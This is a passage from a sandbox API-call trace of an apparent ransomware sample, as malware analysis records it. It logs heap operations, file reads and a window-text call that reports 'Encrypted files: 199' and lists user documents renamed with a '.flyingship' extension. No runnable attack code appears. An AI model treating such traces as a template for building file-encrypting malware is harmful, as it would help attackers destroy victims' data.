dwFlags=0x0, lpMem=0xdd83a0 | out: hHeap=0xbc0000) returned 1 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320c8 | out: hHeap=0xbc0000) returned 1 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8388 | out: hHeap=0xbc0000) returned 1 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32108 | out: hHeap=0xbc0000) returned 1 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32108 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8388 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320c8 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32118 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8388 | out: hHeap=0xbc0000) returned 1 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320c8 | out: hHeap=0xbc0000) returned 1 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd83a0 | out: hHeap=0xbc0000) returned 1 [0259.227] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32118 | out: hHeap=0xbc0000) returned 1 [0259.227] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76e00000 [0259.228] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.228] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32118 [0259.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.228] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xd) returned 0xdd8388 [0259.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0xdd8388, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMessageW", lpUsedDefaultChar=0x0) returned 13 [0259.228] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8388 | out: hHeap=0xbc0000) returned 1 [0259.229] GetProcAddress (hModule=0x76e00000, lpProcName="SendMessageW") returned 0x76e19679 [0259.229] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd83a0 | out: hHeap=0xbc0000) returned 1 [0259.229] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32118 | out: hHeap=0xbc0000) returned 1 [0259.229] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fff0 [0259.229] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32118 [0259.229] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320c8 [0259.230] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32128 [0259.230] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32138 [0259.230] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32118 | out: hHeap=0xbc0000) returned 1 [0259.230] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320c8 | out: hHeap=0xbc0000) returned 1 [0259.230] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32128 | out: hHeap=0xbc0000) returned 1 [0259.230] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32138 | out: hHeap=0xbc0000) returned 1 [0259.230] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fff0 | out: hHeap=0xbc0000) returned 1 [0259.230] SendMessageW (hWnd=0x40168, Msg=0xc5, wParam=0x3b9ac9ff, lParam=0x0) returned 0x1 [0259.230] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32138 [0259.230] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x214) returned 0xc073f0 [0259.230] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x14) returned 0xcec9b8 [0259.230] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.231] TranslateMessage (lpMsg=0x7df904) returned 0 [0259.231] DispatchMessageW (lpMsg=0x7df904) returned 0xffffffff [0259.231] GetForegroundWindow () returned 0x100ea [0259.231] GetWindowLongW (hWnd=0x100ea, nIndex=-21) returned 0 [0259.231] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0259.231] CreateSolidBrush (color=0x0) returned 0x18100718 [0259.232] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.232] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df98c | out: lpNewFilePointer=0x0) returned 1 [0259.232] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df99c | out: lpNewFilePointer=0x0) returned 1 [0259.233] ReadFile (in: hFile=0x5f4, lpBuffer=0xe4ce88, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df9c4, lpOverlapped=0x0 | out: lpBuffer=0xe4ce88*, lpNumberOfBytesRead=0x7df9c4*=0x4011, lpOverlapped=0x0) returned 1 [0259.234] ReadFile (in: hFile=0x5f4, lpBuffer=0xe4ce88, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df9c4, lpOverlapped=0x0 | out: lpBuffer=0xe4ce88*, lpNumberOfBytesRead=0x7df9c4*=0x0, lpOverlapped=0x0) returned 1 [0259.234] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ff8 | out: hHeap=0xbc0000) returned 1 [0259.234] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe5ce90 | out: hHeap=0xbc0000) returned 1 [0259.234] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.234] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df9c0 | out: lpNewFilePointer=0x0) returned 1 [0259.235] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.235] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df9c0 | out: lpNewFilePointer=0x0) returned 1 [0259.235] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df9a4 | out: lpNewFilePointer=0x0) returned 1 [0259.235] ReadFile (in: hFile=0x5f4, lpBuffer=0xe4ce88, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df9cc, lpOverlapped=0x0 | out: lpBuffer=0xe4ce88*, lpNumberOfBytesRead=0x7df9cc*=0x4011, lpOverlapped=0x0) returned 1 [0259.236] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0259.236] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fd70 | out: hHeap=0xbc0000) returned 1 [0259.236] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ff8 | out: hHeap=0xbc0000) returned 1 [0259.237] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.237] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df53c | out: lpNewFilePointer=0x0) returned 1 [0259.237] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df54c | out: lpNewFilePointer=0x0) returned 1 [0259.237] ReadFile (in: hFile=0x5f4, lpBuffer=0xe4ce88, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df574, lpOverlapped=0x0 | out: lpBuffer=0xe4ce88*, lpNumberOfBytesRead=0x7df574*=0x4011, lpOverlapped=0x0) returned 1 [0259.237] ReadFile (in: hFile=0x5f4, lpBuffer=0xe4ce88, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df574, lpOverlapped=0x0 | out: lpBuffer=0xe4ce88*, lpNumberOfBytesRead=0x7df574*=0x0, lpOverlapped=0x0) returned 1 [0259.237] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32068 | out: hHeap=0xbc0000) returned 1 [0259.237] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe64ec8 | out: hHeap=0xbc0000) returned 1 [0259.237] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.238] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df470 | out: lpNewFilePointer=0x0) returned 1 [0259.238] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.238] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df470 | out: lpNewFilePointer=0x0) returned 1 [0259.238] SetFilePointerEx (in: hFile=0x5f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df454 | out: lpNewFilePointer=0x0) returned 1 [0259.238] ReadFile (in: hFile=0x5f4, lpBuffer=0xe4ce88, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x7df47c, lpOverlapped=0x0 | out: lpBuffer=0xe4ce88*, lpNumberOfBytesRead=0x7df47c*=0x4011, lpOverlapped=0x0) returned 1 [0259.242] SetWindowTextW (hWnd=0x40168, lpString="Encrypted files: 199\r\n\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS 